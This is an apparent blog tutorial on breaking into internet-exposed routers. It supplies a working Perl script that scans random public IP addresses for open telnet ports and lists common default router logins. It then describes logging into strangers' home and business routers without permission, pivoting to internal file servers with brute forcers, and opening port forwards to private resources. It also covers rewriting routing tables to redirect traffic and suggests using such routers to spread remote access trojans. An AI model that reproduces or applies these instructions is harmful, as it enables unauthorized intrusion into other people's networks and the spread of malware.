REMOTE ROUTER HACKING
Introduction
Ok, Basically this tutorial deals with how to scan large amounts of
addresses for telnet services, which we can then attempt to use default
credentials to log in with surprising success.
- Why Telnet? Isn't That Dead Now?
Your partly correct, telnet is dead now, it was superseded by
SSH because telnet sends packets in plain text where as SSH encrypts
packets. But telnet is still very much used on routers for simple
administration by low tech management systems that come packaged with
alot of off the shelf routers. Some of these routers allow remote
clients to connect to telnet as well as local users - these are the
boxes that we are looking for.
- So what do i need ?
You'll need to run this perl script, (written by me, found
below), this simply generates a random IP address, if the IP is in a
scannable class (ie not a private, experimental or loop back address)
the programme attempts to open a connection to the telnet port (23) of
the random ip, if it succeeds the program logs the success in a local
file for later analysis. The program then repeats -- so if you run a few
instances of the program for a few hours you can end up with a list of
around 200 telnet servers - ive left mine overnight before and collected
880 servers before.
Code:
#!/usr/bin/perl
use IO::Socket;
########################### IP GENERATOR ########################
sub ipgen(){
my $range1 = 223; #avoid experimental and multicast
my $range2 = 254;
$oct1 = int(rand($range1)) + 1; #generate random octects
$oct2 = int(rand($range2)) + 1;
$oct3 = int(rand($range2)) + 1;
$oct4 = int(rand($range2)) + 1;
if($oct1 == 127 || $oct1 == 172 || $oct1 == 192 || $oct1 == 10){#if gets rid of loopbacks and private ips
$ip = &ipgen(); #if local or private call again
}else{
$ip = "$oct1.$oct2.$oct3.$oct4"; # otherwise allocate the ip to return
}
return $ip; #return to caller
}
#################################################################
############################## MAIN #############################
print "########################################\n";
print "#---------Random Telnet Scanner--------#\n";
print "#-----------Written by 50LaR15---------#\n";
print "########################################\n";
while(1==1){ # keeps code running indefinatly
$target = &ipgen(); # get random ip to scan
print "*??* SCANNING: $target \n"; # output
my $sock = new IO::Socket::INET ( # try to create socket to chose random address
PeerAddr => $target,
PeerPort => '23', # change this number to change ports you want to detect
Proto => 'tcp',
Timeout => '3', # you can get away with a timeout of 1 second but i have 2 to be safe
);
if($sock){ # if socket opened (port open)
print "*!!* SUCCESS-: $target \n"; # print to screen
open(DAT, ">>telnet.txt") || die("Cannot Open Output File"); # open results file
print DAT "SUCCESS: $target \n"; # append findings to end of file
close(DAT); # close the file
}
close($sock); # close the socket
}################################################################
Youll also need need a telnet client - I recommend you use putty
because it supports proxys, but you are dealing with people who dont
know how to change there router passwords so you shouldnt be too worried
so you can use the defauly OS telnet client - for windows XP/linux
users you will already have one - for windows 7 users you will need to
enable yours with this tutorial .
- Ok - I'm Set Up - So Now What?
Youll need to start a few instances of the perl script, you can make your desktop look pretty like mine below if you wish.
You can just run one but it will take longer to get a decent sized
list of servers. I run 5 for around half an hour and that gives me a
list of around 50 telnet boxes.
Ok now you have your list of IP's with the telnet port open (called
telnet.txt in the same directory as your perl script), what you need to
do is take your telnet client and just start connecting to them, - you
will be prompted for a username + password.
This is where it gets fun - because alarge amount of routers ship with default accounts - here are the most common.
Username:Password
_________________
admin : admin
admin : (blank password)
root : (blank)
root : root
To be honest alot of routers disclose there model number in the
telnet banner when you connect so a simple google search often turns up
the default username and password. Otherwise i try the top 3 and usually
get disconnected and move on to the next in my list.
You will find out quiet fast how many ip's in your list you can actually log into with full admin rights
- Who Exactly Am I Hacking?
This is half the fun for me - you dont really know - if your
interested you can just do a quick whois -but around 90% of the time
your dealing with home routers that people have bought from a shop and
not configured properly but i have found business and offices that have
succumb to the same laziness as the home user so the possibilities are
endless.
- Ok now what ?
From here its up to you what you do, but i enjoy using simple
network tools like ipconfig and ping to map out the network, sometimes i
have found routers that have nmap and telnet clients on etc. Today i
found one that let me download any C code onto it i wanted - almost
every router OS is different so some take a while to get used to what
commands you can run but it is alot of fun finding out peoples network
layout, i have compromised routers, made my way into the internal file
servers of the network using brute forcers, or setting up port
forwarding on the router to give me access externally to otherwise
private internal resources - you can even port forward packets to
printers and use them across the internet to print out hundreds of copys
of the dictionary or what ever literature tickles your pickle.
A funny concept that i have got to work in the past is fucking with
the routing tables and redirecting every web request to gay porn sites.
So I would imagine that this could be useful for people trying to get
RAT's spread, especially if you find a router with upwards of 100 PC's
behind the router - but i dont deal much with rat's and botnets so dont
quote me on that.
- A Small Aside.
Ill be happy if a few people read this tutorial and explore a few
networks because thats what used to drive hacking forwards, and its what
used to motivate hackers, the thrill of exploring the unknown, the
chance of coming across a really large network to explore and further
your knowledge and skills of systems. I think people focus too much on
making money from hacking, or getting there best friends fu**book
password and the real fun somehow has been lost in the past 10 years to a
new generation of kids that just want everything now. Lets keep some of
the old skills and knowledge alive and not let it be lost in the
archives of long since abandoned forums and irc rooms.
Thanks For Reading - Happy Hacking
0 komentar:
Post a Comment